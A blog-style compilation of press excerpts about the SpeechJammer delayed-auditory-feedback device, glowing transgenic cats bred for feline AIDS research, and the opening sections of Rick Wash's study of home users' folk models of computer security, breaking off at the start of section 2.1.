SILENCE ENFORCEMENT DEVICE
http://www.extremetech.com/computing/120583-new-speech-jamming-gun-hints-at-dystopian-big-brother-future

Japanese researchers have created a hand-held gun that can jam the words of speakers who are more than 30 meters (100ft) away. The gun has two purposes, according to the researchers: At its most basic, this gun could be used in libraries and other quiet spaces to stop people from speaking — but its second application is a lot more chilling.

The researchers were looking for a way to stop “louder, stronger” voices from saying more than their fair share in conversation. The paper reads: “We have to establish and obey rules for proper turn-taking when speaking. However, some people tend to lengthen their turns or deliberately interrupt other people when it is their turn in order to establish their presence rather than achieve more fruitful discussions. Furthermore, some people tend to jeer at speakers to invalidate their speech.” In other words, this speech-jamming gun was built to enforce “proper” conversations.

The gun works by listening in with a directional microphone, and then, after a short delay of around 0.2 seconds, playing it back with a directional speaker. This triggers an effect that psychologists call Delayed Auditory Feedback (DAF), which has long been known to interrupt your speech (you might’ve experienced the same effect if you’ve ever heard your own voice echoing through Skype or another voice comms program). According to the researchers, DAF doesn’t cause physical discomfort, but the fact that you’re unable to talk is obviously quite stressful.

Suffice it to say, if you’re a firm believer in free speech, you should now be experiencing a deafening cacophony of alarm bells. Let me illustrate a few examples of how this speech-jamming gun could be used. At a political rally, an audience member could completely lock down Santorum, Romney, Paul, or Obama from speaking. On the flip side, a totalitarian state could point the speech jammers at the audienceto shut them up. Likewise, when a celebrity or public figure appears on a live TV show, his contract could read “the audience must be silenced with speech jammers.”

Then there’s Harrison Bergeron, one of my favorite short stories by Kurt Vonnegut. In the story’s dystopian universe, everyone wears “handicaps” to ensure perfect social equality. Strong people must lug around heavy weights, beautiful people must wear masks, and intelligent people must wear headphones that play a huge blast of sound every few seconds, interrupting your thoughts. The more intelligent you are, the more regular the blasts.

Back here in our universe, it’s not hard to imagine a future where we are outfitted with a variety of implanted electronics or full-blown bionic organs. Just last week we wrote about Google’s upcoming augmented-reality glasses, which will obviously have built-in earbuds. Late last year we covered bionic eyesthat can communicate directly with the brain, and bionic ears and noses can’t be far off.

In short, imagine if a runaway mega-corporation or government gains control of these earbuds. Not only could the intelligence-destroying blasts from Harrison Bergeron come to pass, but with Delayed Auditory Feedback it would be possible to render the entire population mute. Well, actually, that’s a lie: Apparently DAF doesn’t work with utterances like “ahhh!” or “boooo!” or other non-wordy constructs. So, basically, we’d all be reduced to communicating with grunts and gestures.

SPEECH-JAMMING
http://www.technologyreview.com/blog/arxiv/27620/
How to Build a Speech-Jamming Gun
Japanese researchers build a gun capable of stopping speakers in mid-sentence / 03/01/2012

The drone of speakers who won’t stop is an inevitable experience at conferences, meetings, cinemas, and public libraries. Today, Kazutaka Kurihara at the National Institute of Advanced Industrial Science and Technology in Tskuba and Koji Tsukada at Ochanomizu University, both in Japan, present a radical solution: a speech-jamming device that forces recalcitrant speakers into submission.

The idea is simple. Psychologists have known for some years that it is almost impossible to speak when your words are replayed to you with a delay of a fraction of a second. Kurihara and Tsukada have simply built a handheld device consisting of a microphone and a speaker that does just that: it records a person’s voice and replays it to them with a delay of about 0.2 seconds. The microphone and speaker are directional so the device can be aimed at a speaker from a distance, like a gun.

In tests, Kurihara and Tsukada say their speech jamming gun works well: “The system can disturb remote people’s speech without any physical discomfort.” Their tests also identify some curious phenomena. They say the gun is more effective when the delay varies in time and more effective against speech that involves reading aloud than against spontaneous monologue.

Kurihara and Tsukada make no claims about the commercial potential of their device but list various aplications. They say it could be used to maintain silence in public libraries and to “facilitate discussion” in group meetings. “We have to establish and obey rules for proper turn-taking when speaking,” they say. That has important implications. “There are still many cases in which the negative aspects of speech become a barrier to the peaceful resolution of conflicts, ” they point out.

CONTACT
Kazutaka Kurihara
http://sites.google.com/site/qurihara/top-english
email : k-kurihara [ at ] aist.go.jp

Koji Tsukada
http://mobiquitous.com/index-e.html
email : tsuka [at] mobiquitous [dot] com

ABSTRACT
http://arxiv.org/abs/1202.6106
SpeechJammer: A System Utilizing Artificial Speech Disturbance with Delayed Auditory Feedback
by Kazutaka Kurihara and Koji Tsukada / 28 Feb 2012

“In this paper we report on a system, “SpeechJammer”, which can be used to disturb people’s speech. In general, human speech is jammed by giving back to the speakers their own utterances at a delay of a few hundred milliseconds. This effect can disturb people without any physical discomfort, and disappears immediately by stop speaking. Furthermore, this effect does not involve anyone but the speaker. We utilize this phenomenon and implemented two prototype versions by combining a direction-sensitive microphone and a direction-sensitive speaker, enabling the speech of a specific person to be disturbed. We discuss practical application scenarios of the system, such as facilitating and controlling discussions. Finally, we argue what system parameters should be examined in detail in future formal studies based on the lessons learned from our preliminary study.”

SPEECHJAMMER
http://www.wired.com/underwire/2012/03/japanese-speech-jamming-gun/

Two Japanese researchers recently introduced a prototype for a device they call a SpeechJammer that can literally “jam” someone’s voice — effectively stopping them from talking. Now they’ve released a video of the device in action. “We have to establish and obey rules for proper turn-taking,” write Kazutaka Kurihara and Koji Tsukada in their article on the SpeechJammer (PDF). “However, some people tend to lengthen their turns or deliberately disrupt other people when it is their turn … rather than achieve more fruitful discussions.”

The researchers released the video after their paper went viral Thursday, to the authors’ apparent surprise. “Do you know why our project is suddenly becoming hot now?” asked Kurihara, a research scientist at the National Institute of Advanced Industrial Science and Technology in Tsukuba, in an e-mail exchange with Wired.com. (Kurihara’s partner Tsukada is an assistant professor at Ochanomizu University in Tokyo.)

The design of the SpeechJammer is deceptively simple. It consists of a direction-sensitive microphone and a direction-sensitive speaker, a motherboard, a distance sensor and some relatively straightforward code. The concept is simple, too — it operates on the well-studied principle of delayed auditory feedback. By playing someone’s voice back to them, at a slight delay (around 200 milliseconds), you can jam a person’s speech.

Sonic devices have popped up in pop culture in the past. In sci-fi author J.G. Ballard’s short story “The Sound-Sweep,” published in 1960, a vacuum cleaner called a “sonovac” sweeps up the debris of old sounds. The wily German composer Karlheinz Stockhausen had plans for a “sound swallower,” which would cancel unwanted sounds in the environment using the acoustic principle of destructive interference. And in 1984 German film Decoder, special yellow cassette tapes play “anti-Muzak” that destroys the lulling tones of Muzak, stimulating diners at a fast-food restaurant to throw up en masse and start rioting.

But instead of sci-fi, the Japanese researchers behind the SpeechJammer looked to medical devices used to help people with speech problems. Delayed auditory feedback, or DAF, devices have been used to help stutterers for decades. If a stutterer hears his own voice at a slight delay, stuttering often improves. But if a non-stutterer uses a DAF device designed to help stutterers, he can start stuttering — and the effect is more pronounced if the delay is longer, up to a certain point.

“We utilized DAF to develop a device that can jam remote physically unimpaired people’s speech whether they want it or not,” write the researchers. “[The] device possesses one characteristic that is different from the usual medical DAF device; namely, the microphone and speaker are located distant from the target.”

Being at a distance from the target means it’s possible to aim the device at people who are several feet away — sort of like a TV B-Gone, but for people. Bothered by what someone at a meeting is saying? Point the SpeechJammer at him. Can’t stand your nattering in-laws? Time for the SpeechJammer. In the wrong hands — criminals, for instance, or repressive governments — the device could have potentially sinister applications. For now, it remains a prototype.

INSPIRATION
http://www.wired.com/underwire/2012/03/speech-jamming-gun-inspiration/

“One day I just came by a science museum and enjoyed a demonstration about Delayed Auditory Feedback (DAF) at [the] cognitive science corner,” says Kurihara. “When I spoke to a microphone, my voice came back to me after a few hundred millisecond delay. Then, I could not continue to speak any more. That’s fun!”

Kurihara soon realized his adventures in the science museum could be applicable to other fields. He was already interested in developing a system that “controls appropriate turn-taking at discussions.” The science museum visit was his “aha!” moment. “Then I came up with the gun-type SpeechJammer idea utilizing DAF,” says Kurihara. “That’s the destiny.”

Kurihara enlisted the talents of Koji Tsukada, an assistant professor at Tokyo’s Ochanamizu University who he calls “the gadget master.” Tsukada has been involved in a number of strange and intriguing projects, including the LunchCommunicator, a “lunchbox-type device which supports communication between family members”; the SmartMakeupSystem, which “helps users find new makeup methods for use with their daily cosmetics”; and the EaTheremin, a “fork-type instrument that enables users to play various sounds by eating foods”.

Tsukada introduced Kurihara to a parametric speaker kit, which they could use to convey sound in a very direction-sensitive way. “After I explained him my idea, he soon agreed to join my project,” says Kurihara. “It was a marriage between science and gadgets!”

As for SpeechJammer’s potentially sinister uses? “We hope SpeechJammer is used for building the peaceful world,” says Kurihara. The world can only hope.

Advertisements

FELINE AIDS RESEARCH
http://www.guardian.co.uk/science/2011/sep/11/genetically-modified-glowing-cats
Glow cat: fluorescent green felines could help study of HIV
Scientists hope cloning technique that produced genetically modified cats will aid human and feline medical research
by Alok Jha / 11 September 2011

It is a rite of passage for any sufficiently advanced genetically modified animal: at some point scientists will insert a gene that makes you glow green. The latest addition to this ever-growing list – which includes fruit flies, mice, rabbits and pigs – is the domestic cat. US researcher Eric Poeschla has produced three glowing GM cats by using a virus to carry a gene, called green fluorescent protein (GFP), into the eggs from which the animals eventually grew. This method of genetic modification is simpler and more efficient than traditional cloning techniques, and results in fewer animals being needed in the process. The GFP gene, which has its origins in jellyfish, expresses proteins that fluoresce when illuminated with certain frequencies of light. Poeschla, of the Mayo Clinic in Rochester, Minnesota, reported his results in the journal Nature Methods. This function is regularly used by scientists to monitor the activity of individual genes or cells in a wide variety of animals. The development and refinement of the GFP technique earned its scientific pioneers the Nobel prize for chemistry in 2008.

In the case of the glowing cats, the scientists hope to use the GM animals in the study of HIV/Aids. “Cats are susceptible to feline immunodeficiency virus [FIV], a close relative of HIV, the cause of Aids,” said professors Helen Sang and Bruce Whitelaw of the Roslin Institute at the University of Edinburgh, where scientists cloned Dolly the sheep in 1996. “The application of the new technology suggested in this paper is to develop the use of genetically-modified cats for the study of FIV, providing valuable information for the study of Aids. “This is potentially valuable but the uses of genetically modified cats as models for human diseases are likely to be limited and only justified if other models – for example in more commonly used laboratory animals, like mice and rats – are not suitable.” Dr Robin Lovell-Badge, head of developmental genetics at the Medical Research Council’s national institute for medical research, said: “Cats are one of the few animal species that are normally susceptible to such viruses, and indeed they are subject to a pandemic, with symptoms as devastating to cats as they are to humans. “Understanding how to confer resistance is … of equal importance to cat health and human health.”

THAT GLOW GREEN
http://www.newscientist.com/article/dn20896-glowing-transgenic-cats-could-boost-aids-research.html?DCMP=OTC-rss&nsref=online-news
Glowing transgenic cats could boost AIDS research
by Andy Coghlan / 11 September 2011

Three cats genetically modified to resist feline immunodeficiency virus (FIV) have opened up new avenues for AIDS research. The research could also help veterinarians combat the virus, which kills millions of feral cats each year and also infects big cats, including lions. Prosaically named TgCat1, TgCat2 and TgCat3, the GM cats – now a year old – glow ghostly green under ultraviolet light because they have been given the green fluorescent protein (GFP) geneMovie Camera originating from jellyfish. The GM cats also carry an extra monkey gene, called TRIMCyp, which protects rhesus macaques from infection by feline immunodeficiency virus or FIV – responsible for cat AIDS. By giving the gene to the cats, the team hopes to offer the animals protection from FIV. Their study could help researchers develop and test similar approaches to protecting humans from infection with HIV.

Cat immunity
Already, the researchers have demonstrated that lab cultures of white blood cells from the cats are protected from FIV, and they hope to give the virus to the cats to check whether they are immune to it. “The animals clearly have the protective gene expressed in all their tissues including the lymph nodes, thymus and spleen,” says Eric Poeschla of the Mayo Clinic College of Medicine in Rochester, Minnesota, who led the research. “That’s crucial because that’s where the disease really happens, and where you see destruction of T-cells targeted by HIV in humans.” The animals are not the first GM cats, but the new method is far more efficient and versatile than previous techniques. The first cloned cat, born in 2001, was the only one to survive from 200 embryos, each created by taking an ear cell from cats, removing the nucleus and fusing it with a cat egg cell emptied of its own nucleus. Poeschla’s technique is far more direct, far more efficient and far simpler, and has already been used successfully to make GM mice, pigs, cows and monkeys. He loads genes of interest into a lentivirus, which he then introduces directly into a cat oocyte, or egg cell. The oocyte loaded with the new genes is then fertilised and placed in the womb of a foster mother. From 22 implantations, Poeschla achieved 12 fetuses in five pregnancies, and three live births. And out of the 12 fetuses, 11 successfully incorporated the new genes, demonstrating how efficient the method is. One surviving male kitten, TgCat1, has already mated with three normal females, siring eight healthy kittens that all carry the implanted genes as well, showing that they are inheritable. But there are doubts about whether cats will replace monkeys as the staples of HIV research. “It’s fantastic they’ve created GM cats,” says Theodora Hatziioannou of the Aaron Diamond AIDS Research Center in New York City. “But what makes research in monkeys so much better is that SIV in monkeys is much more closely related to HIV, so it’s more straightforward to draw conclusions than it would be with FIV.

 

THAT GLOW RED
http://news.nationalgeographic.com/news/2009/05/photogalleries/glowing-animal-pictures#/cats-cloned-glowing-animals_11832_600x450.jpg
May 14, 2009 / Photo by Choi Byung-kil/Yonhap via AP

How does it glow?
Red fluorescent protein, introduced via a virus into cloned DNA, which was implanted in cat eggs, then implanted in mother (2007)

What can we learn?
Scientists at Gyoengsang National University in South Korea both cloned a Turkish Angora house cat and made it fluorescent—as shown in the glowing cat (left) photographed in a dark room under ultraviolet light. (The nonfluorescent cat, at right, appears green in these conditions.) The scientists weren’t the first to clone a cat–they weren’t even the first to clone a fluorescent cat. But they were the first to clone a cat that fluoresces red. It’s hoped that the red glow, which appears in every organ of the cats, will improve the study of genetic diseases.


CONTACT
Eric Poeschla
http://mayoresearch.mayo.edu/mayo/research/poeschla/
http://mayoresearch.mayo.edu/staff/poeschla_em.cfm
email : Poeschla.Eric [at] mayo [dot] edu

PRESS RELEASE
http://www.nature.com/nmeth/journal/vaop/ncurrent/full/nmeth.1703.html
http://www.mayoclinic.org/news2011-rst/6434.html
Mayo Clinic Teams with Glowing Cats Against AIDS, Other Diseases
New Technique Gives Cats Protection Genes / September 11, 2011

Mayo Clinic researchers have developed a genome-based immunization strategy to fight feline AIDS and illuminate ways to combat human HIV/AIDS and other diseases. The goal is to create cats with intrinsic immunity to the feline AIDS virus. The findings — called fascinating and landmark by one reviewer — appear in the current online issue of Nature Methods. Feline immunodeficiency virus (FIV) causes AIDS in cats as the human immunodeficiency virus (HIV) does in people: by depleting the body’s infection-fighting T-cells. The feline and human versions of key proteins that potently defend mammals against virus invasion — termed restriction factors — are ineffective against FIV and HIV respectively. The Mayo team of physicians, virologists, veterinarians and gene therapy researchers, along with collaborators in Japan, sought to mimic the way evolution normally gives rise over vast time spans to protective protein versions. They devised a way to insert effective monkey versions of them into the cat genome. “One of the best things about this biomedical research is that it is aimed at benefiting both human and feline health,” says Eric Poeschla, M.D., Mayo molecular biologist and leader of the international study. “It can help cats as much as people.”

Dr. Poeschla treats patients with HIV and researches how the virus replicates. HIV/AIDS has killed over 30 million people and left countless children orphaned, with no effective vaccine on the horizon. Less well known is that millions of cats also suffer and die from FIV/AIDS each year. Since the project concerns ways introduced genes can protect species against viruses, the knowledge and technology it produces might eventually assist conservation of wild feline species, all 36 of which are endangered. The technique is called gamete-targeted lentiviral transgenesis — essentially, inserting genes into feline oocytes (eggs) before sperm fertilization. Succeeding with it for the first time in a carnivore, the team inserted a gene for a rhesus macaque restriction factor known to block cell infection by FIV, as well as a jellyfish gene for tracking purposes. The latter makes the offspring cats glow green.

The macaque restriction factor, TRIMCyp, blocks FIV by attacking and disabling the virus’s outer shield as it tries to invade a cell. The researchers know that works well in a culture dish and want to determine how it will work in vivo. This specific transgenesis (genome modification) approach will not be used directly for treating people with HIV or cats with FIV, but it will help medical and veterinary researchers understand how restriction factors can be used to advance gene therapy for AIDS caused by either virus. The method for inserting genes into the feline genome is highly efficient, so that virtually all offspring have the genes. And the defense proteins are made throughout the cat’s body. The cats with the protective genes are thriving and have produced kittens whose cells make the proteins, thus proving that the inserted genes remain active in successive generations.

The other researchers are Pimprapar Wongsrikeao, D.V.M., Ph.D.; Dyana Saenz, Ph.D.; and Tommy Rinkoski, all of Mayo Clinic; and Takeshige Otoi, Ph.D., of Yamaguchi University, Japan. The research was supported by Mayo Clinic and the Helen C. Levitt Foundation. Grants from the National Institutes of Health supported key prior technology developments in the laboratory.


A ‘glow in the dark’ kitten viewed under a special blue light, next to a non-modified cat. Both cats’ fur looks the same under regular light. {Photograph: Mayo Clinic}

FOLK MODELS of HOME COMPUTER SECURITY
http://www.schneier.com/blog/archives/2011/03/folk_models_in.html
http://www.rickwash.com/papers/rwash-dissertation-final.pdf
http://www.rickwash.com/papers/rwash-homesec-soups10-final.pdf
by Rick Wash / at SOUPS (Symposium on Usable Privacy and Security)

Home computer systems are insecure because they are administered by untrained users. The rise of botnets has amplified this problem; attackers compromise these computers, aggregate them, and use the resulting network to attack third parties. Despite a large security industry that provides software and advice, home computer users remain vulnerable. I identify eight ‘folk models’ of security threats that are used by home computer users to decide what security software to use, and which expert security advice to follow: four conceptualizations of ‘viruses’ and other malware, and four conceptualizations of ‘hackers’ that break into computers. I illustrate how these models are used to justify ignoring expert security advice. Finally, I describe one reason why botnets are so difficult to eliminate: they cleverly take advantage of gaps in these models so that many home computer users do not take steps to protect against them.

1. INTRODUCTION
Home users are installing paid and free home security software at a rapidly increasing rate.{1} These systems include anti-virus software, anti-spyware software, personal firewall software, personal intrusion detection / prevention systems, computer login / password / fingerprint systems, and intrusion recovery software. Nonetheless, security intrusions and the costs they impose on other network users are also increasing. One possibility is that home users are starting to become well-informed about security risks, and that soon enough of them will protect their systems that the problem will resolve itself. However, given the “arms race” history in most other areas of networked security (with intruders becoming increasingly sophisticated and numerous over time), it is likely that the lack of user sophistication and non-compliance with recommended security system usage policies will continue to limit home computer security effectiveness. To design better security technologies, it helps to understand how users make security decisions, and to characterize the security problems that result from these decisions. To this end, I have conducted a qualitative study to understand users’ mental models [18, 11] of attackers and security technologies. Mental models describe how a user thinks about a problem; it is the model in the person’s mind of how things work. People use these models to make decisions about the effects of various actions [17]. In particular, I investigate the existence of folk models for home computer users. Folk models are mental models that are not necessarily accurate in the real world, thus leading to erroneous decision making, but are shared among similar members of a culture[11]. It is well-known that in technological contexts users often operate with incorrect folk models [1]. To understand the rationale for home users’ behavior, it is important to understand the decision model that people use. If technology is designed on the assumption that users have correct mental models of security threats and security systems, it will not induce the desired behavior when they are in fact making choices according to a different model. As an example, Kempton [19] studied folk models of thermostat technology in an attempt to understand the wasted energy that stems from poor choices in home heating. He found that his respondents possessed one of two mental models for how a thermostat works. Both models can lead to poor decisions, and both models can lead to correct decisions that the other model gets wrong. Kempton concludes that “Technical experts will evaluate folk theory from this perspective [correctness] – not by asking whether it fulfills the needs of the folk. But it is the latter criterion […] on which sound public policy must be based.” The same argument holds for technology design: whether the folk models are correct or not, technology should be designed to work well with the folk models actually employed by users.{2} For home computer security, I study two related research questions: 1) Potential threats : How do home computer users conceptualize the information security threats that they face? 2) Security responses : How do home computer users apply their mental models of security threats to make security-relevant decisions? Despite my focus on “home computer users,” many of these problems extend beyond the home; most of my analysis and understanding in this paper is likely to generalize to a whole class of users who are unsophisticated in their security decisions. This includes many university computers, computers in small business that lack IT support, and personal computers used for business purposes.

{1} Despite a worldwide recession, the computer security industry grew 18.6% in 2008, totaling over $13 billion according to a recent Gartner report [9]
{2} It may be that users can be re-educated to use more correct mental models, but generally it more difficult to re-educate


http://www.csoonline.com/documents/flash/ammap/ammap.swf

1.1 Understanding Security
Managing the security of a computer system is very difficult. Ross Anderson’s [2] study of Automated Teller Machine (ATM) fraud found that the majority of the fraud committed using these machines was not due to technical flaws, but to errors in deployment and management failures. These problems illustrate the difficulty that even professionals face in producing effective security. The vast ma jority of home computers are administered by people who have little security knowledge or training. Existing research has investigated how non-expert users deal with security and network administration in a home environment. Dourish et al. [12] conducted a related study, inquiring not into mental models but how corporate knowledge workers handled security issues. Gross and Rossum [15] also studied what security knowledge end users posses in the context of large organizations. And Grinter et al. [14] interviewed home network users about their network administration practices. Combining the results from these papers, it appears that many users exert much effort to avoid security decisions. All three papers report that users often find ways to delegate the responsibility for security to some external entity; this entity could be technological (like a firewall), social (another person or IT staff ), or institutional (like a bank). Users do this because they feel like they don’t have the skills to maintain proper security. However, despite this delegation of responsibility, many users still make numerous security-related decisions on a regular basis. These papers do not explain how those decisions get made; rather, they focus mostly on the anxiety these decisions create. I add structure to these observations by describing how folk models enable home computer users to make security decisions they cannot delegate. I also focus on differences between people, and characterize different methods of dealing with security issues rather than trying to find general patterns. The folk models I describe may explain differences observed between users in these studies. Camp [6] proposed using mental models as a framework for communicating complex security risks to the general populace. She did not study how people currently think about security, but proposed five possible models that may be useful. These models take the form of analogies or metaphors with other similar situations: physical security, medical risks, crime, warfare, and markets. Asghapour et al. [3] built on this by conducting a card sorting experiment that matches these analogies with the mental models of uses. They found that experts and non-experts show sharp differences in which analogy their mental model is closest to. Camp et al. began by assuming a small set of analogies that they believe function as mental models. Rather than pre-defining the range of posssible models, I treat these mental models as a legitimate area for inductive investigation, and endeavor to uncover users’ mental models in whatever form they take. This prior work confirms that the concept of mental models may be useful for home computer security, but made assumptions which may or may not be appropriate. I fill in the gap by inductively developing an understanding of just what mental models people actually possess. Also, given the vulnerability of home computers and this finding that experts and non-experts differ sharply [3], I focus solely on non-expert home computer users. Herley [16] argues that non-expert users reject security advice because it is rational do to so. He believes that security experts provide advice that ignores the costs of the users’ time and effort, and therefore overestimates the net value of security. I agree, though I dig deeper into understanding how users actually make these security / effort tradeoffs.

1.2 Botnets and Home Computer Security
In the past, computers were targeted by hackers approximately in proportion to the amount of value stored on them or accessible from them. Computers that stored valuable information, such as bank computers, were a common target, while home computers were fairly innocuous. Recently, attackers have used a technique known as a ‘botnet,’ where they hack into a number of computers and install special ‘control’ software on those computers. The hacker can give a master control computer a single command, and it will be carried out by all of the compromised computers (called zombies) it is connected to [4, 5]. This technology enables crimes that require large numbers of computers, such as spam, click fraud, and distributed denial of service [26]. Observed botnets range in size from a couple hundred zombies to 50,000 or more zombies. As John Markoff of the New York Times observes, botnets are not technologically novel; rather, “what is new is the vastly escalating scale of the problem” [21]. Since any computer with an Internet connection will be an effective zombie, hackers have logically turned to attacking the most vulnerable population: home computers. Home computer users are usually untrained and have few technical skills. While some software has improved the average level of security of this class of computers, home computers still represent the largest population of vulnerable computers. When compromised, these computers are often used to commit crimes against third parties. The vulnerability of home computers is a security problem for many companies and individuals who are the victims of these crimes, even if their own computers are secure [7].

1.3 Methods
I conducted a qualitative inquiry into how home computer users understand and think about potential threats. To develop depth in my exploration of the folk models of security, I used an iterative methodology as is common in qualitative research [24]. I conducted multiple rounds of interviews punctuated with periods of analysis and tentative conclusions. The first round of 23 semi-structured interviews was conducted in Summer 2007. Preliminary analysis proceeded throughout the academic year, and a second round of 10 interviews was conducted in Summer 2008, for a total of 33 respondents. This second round was more focused, and specifically searched for negative cases of earlier results [24]. Interviews averaged 45 minutes each; they were audio recorded and transcribed for analysis. Respondents were chosen from a snowball sample [20] of home computer users evenly divided between three mid-western U.S. cities. I began with a few home computer users that I knew in these cities. I asked them to refer me to others in the area who might be information-rich informants. I screened these potential respondents to exclude people who had expertise or training in computers or computer security. From those not excluded, I purposefully selected respondents for maximum variation [20]: I chose respondents from a wide variety of backgrounds, ages, and socio-economic classes. Ages ranged from undergraduate (19 years old) up through retired (over 70). Socio-economic status was not explicitly measured, but ranged from recently graduated artist living in a small efficiency up to a successful executive who owns a large house overlooking the main river through town. Selecting for maximal variation allows me to document diverse variations in folk models and identify important common patterns [20]. After interviewing the chosen respondents, I grew by potential interview pool by asking them to refer me to more people with home computers who might provide useful information. This snowballing through recommendations ensured that the contacted respondents would be information-rich [20] and cooperative. These new potential respondents were also screened, selected, and interviewed. The method does not generate a sample that is representative of the population of home computer users. However, I don’t believe that the sample is a particularly special or unusual group; it is likely that there are other people like them in the larger population.

I developed an (IRB approved) face-to-face semi-structured interview protocol that pushes sub jects to describe and use their mental models, based on formal methods presented by D’Andrade [11]. I specifically probed for past instances where the respondents would have had to use their mental model to make decisions, such as past instances of security problems, or efforts undertaken to protect their computers. By asking about instances where the model was applied to make decisions, I enabled the respondents to uncover beliefs that they might not have been consciously aware of. This also ensures that the respondents believe their model enough to base choices on it. The ma jority of each interview was spent on follow-up questions, probing deeper into the responses of the sub ject. This method allows me to describe specific, detailed mental models that my participants use to make security decisions, and to be confident that these are models that the participants actually believe. My focus in the first round was broad and exploratory. I asked about any security-related problems the respondent had faced or was worried about; I also specifically asked about viruses, hackers, data loss, and data exposure (identity theft). I probed to discover what countermeasures the respondents used to mitigate these risks. Since this was a semi-structured interview, I followed up on many responses by probing for more information. After preliminary analysis of this data, I drew some tentative conclusions and listed points that needed clarification. To better elucidate these models and to look for negative cases, I conducted 10 second-round interviews using a new (IRB approved) interview protocol. In this round, I focused more on three specific threats that sub jects face: viruses, hackers, and identity theft. For this second round, I also used an additional interviewing technique: hypothetical scenarios. This technique was developed to help focus the respondents and elicit additional information not present in the first round of interviews. I presented the respondents with three hypothetical scenarios and asked the sub jects for their reaction. The three scenarios correspond to each of the three main themes for the second round: finding out you have a virus, finding out a hacker has conpromised your computer, and being informed that you are a victim of identity theft. For each scenario, after the initial description and respondent reaction, I added an additional piece of information that contradicted the mental models I discovered after the first round. For example, one preliminary finding from the first round was that people rarely talked about the creation of computer viruses; it was unclear how they would react to a computer virus that was created by people for a purpose. In the virus scenario, I informed the respondents that the virus in question was written by the Russian mafia. This fact was taken out of recent news linking the Russian mafia to widespread viruses such as Netsky, Bagle, and Storm.{3} Once I had all of the data collected and transcribed, I conducted both inductive and deductive coding of the data to look both for predetermined and emergent themes [23]. I began with a short list of ma jor themes I expected to see from my pilot interviews, such as information about viruses, hackers, identity theft, countermeasures, and sources of information. I identified and labeled (coded) instances when the respondents discussed these themes. I then expanded the list of codes as I noticed interesting themes and patterns emerging. Once all of the data was coded, I summarized the data on each topic by building a data matrix [23].{4} This data matrix helped me to identify basic patterns in the data across sub jects, to check for representativeness, and to look for negative cases [24].

After building the initial summary matrices, I identified patterns in the way respondents talked about each topic, paying specific attention to word choices, metaphors employed, and explicit content of statements. Specifically, I looked for themes in which users differ in their opinions (negative case analysis). These themes became the building blocks for the mental models. I built a second matrix that matched sub jects with these features of mental models.{5} This second matrix allowed me to identify and characterize the various mental models that I encountered. Table 7 in the Appendix shows which participants from Round 2 had each of the 8 models. A similar table was developed for the Round 1 participants. I then took the description of the model back to the data, verified when the model description accurately represented the respondents descriptions, and looked for contradictory evidence and negative cases [24]. This allowed me to update the models with new information or insights garnered by following up on surprises and incorporating outliers. This was an iterative process; I continued updating model descriptions, looking for negative cases, and checking for representativeness until I felt that the model descriptions I had accurately represented the data. In this process, I developed further matrices as data visualizations, some of which appear in my descriptions below.

{3} http://www.linuxinsider.com/story/33127.html?wlc=1244817301
{4} A fragment of this matrix can be seen in Table 5 in the Appendix.
{5} A fragment of this matrix is Table 6 in the Appendix.

2. FOLK MODELS of SECURITY THREATS
I identified a number of different folk models in the data. Every folk model was shared by multiple respondents in this study. The purpose of qualitative research is not to generalize to a population; rather, it is to explore phenomenon in depth. To avoid misleading readers, I do not report how many users possessed each folk model. Instead, I describe the full range of folk models I observed. I divide the folk models into two broad categories based on a distinction that most sub jects possessed: 1) models about viruses, spyware, adware, and other forms of malware which everyone refered to under the umbrella term ‘virus’; and 2) models about the attackers, referred to as ‘hackers,’ and the threat of ‘breaking in to’ a computer. Each respondent had at least one model from each of the two categories. For example, Nicole {6} believed that viruses were mischievous, and hackers are criminals who target big fish. These models are not necessarily mutually exclusive. For example, a few respondents talked about different types of hackers and would describe more than one folk model of hackers. Note that by listing and describing these folk models, in no way do I intend to imply that these models are incorrect or bad in any way. They are all certainly incomplete, and do not exactly correspond to the way malicious software or malicious computer users behave. But, as Kempton [19] learned in his study of home thermostats, what is important is not how accurate the model is but how well it serves the needs of the home computer user in making security decisions. Additionally, there is not “correct” model that can serve as a comparison. Even security experts will disagree as to the correct way to think about viruses or hackers. To show an extreme example, Medin et al. [22] conducted a study of expert fishermen in the Northwoods of Wisconsin. They looked at the mental models of both Native American fishermen and of majority-culture fishermen. Despite both groups being experts, the two groups showed dramatic differences in the way fish were categorized and classified. Majority-culture fishermen grouped fish into standard taxonomic and goal-oriented groupings, while Native American fishermen groups fish mostly by ecological niche. This illustrates how even experts can have dramatically different mental models of the same phenomenon, and any single expert’s model is not necessarily correct. However, experts and novices do tend to have very different models; Asgharpour et al. [3] found strong differences between expert and novice computer users in their mental models of security.

Common Elements of Folk Models
Most respondents made a distinction between ‘viruses’ and ‘hackers.’ To them, these are two separate threats that can both cause problems. Some people believed that viruses are created by hackers, but they still usually saw them as distinct threats. A few respondents realized this and tried to describe the difference; for example at one point in the interview Irving tries to explain the distinction by saying “The hacker is an individual hacking, while the virus is a program infecting.” After some thought, he clarifies his idea of the difference a bit: “So it’s a difference between something automatic and more personal.” This description is characteristic of how many respondents think about the difference: viruses are usually more programatic and automatic, where hacking is more like manual labor, requiring the hacker to be sitting in front of a computer entering commands. This distinction between hackers and viruses is not something that most of the respondents had thought about; it existed in their mental model but not at a conscious level. Upon prompting, Dana decides that “I guess if they hack into your system and get a virus on there, it’s gonna be the same thing.” She had never realized that they were distinct in her mind, but it makes sense to her that they might be related. She then goes on to ask the interviewer if she gets hacked, can she forward it on to other people? This also illustrates another common feature of these interviews. When exposed to new information, most of the respondents would extrapolate and try to apply that information to slightly different settings. When Dana was prompted to think about the relationship between viruses and hackers, she decided that they were more similar than she had previously realized. Then she began to apply ideas from one model (viruses spreading) to the other model (can hackers spread also?) by extrapolating from her current models. This is a common technique in human learning and sensemaking [25]. I suspect that many details of the mental models were formed in this way. Extrapolation is also useful for analysis; how respondents extrapolate from new information reveals details about mental models that are not consciously salient during interviews [8, 11]. During the interviews I used a number of prompts that were intended to challenge mental models and force users to extrapolate in order to help surface more elements of their mental models.

2.1 Models of Viruses and other Malware
